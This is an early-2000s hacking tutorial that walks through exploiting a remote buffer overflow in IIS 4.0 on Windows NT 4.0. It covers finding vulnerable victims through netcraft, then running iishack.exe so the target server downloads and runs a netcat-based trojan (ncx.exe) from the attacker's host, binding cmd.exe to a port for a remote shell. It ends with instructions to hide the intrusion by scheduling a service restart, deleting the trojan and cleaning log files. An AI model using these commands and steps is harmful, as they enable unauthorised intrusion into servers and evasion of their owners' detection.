How to Attack IIS – Buffer Overflow

The Internet Information Server Attack – Remote buffer overflow exploit.
By r00tsec from Security Espionage Community.
Revised 03/16/00.

This site is also available in plain text.

Forewords:
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience.
Note: All the files used in this paper can be found at the main page.

According to eEye Digital Security Team the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I performed the attack from a Windows NT 4.0 machine with the required programs:

iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe

Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn’t work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.

How to do it:

First of all you’ll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or you favorite “what’s-this-site-running-search-engine” and find a victim running the affected system.Second, you need to craft a buffer overrun about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.

Output:

——–(IIS 4.0 remote buffer overflow exploit)———-
(c) dark spyrit — barns@eeye.com. http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg – iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include ‘http://’ before hosts!
———————————————————-

Then issue the command as you can see beneath ex.

C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!

note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.

After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.

Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

Voila! Access granted!
Do you whatever you wanna do, but remember to:

    – add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)
    – add a scheduled task to delete ncx.exe X-1 minutes.
    – clean the log files (if there are any).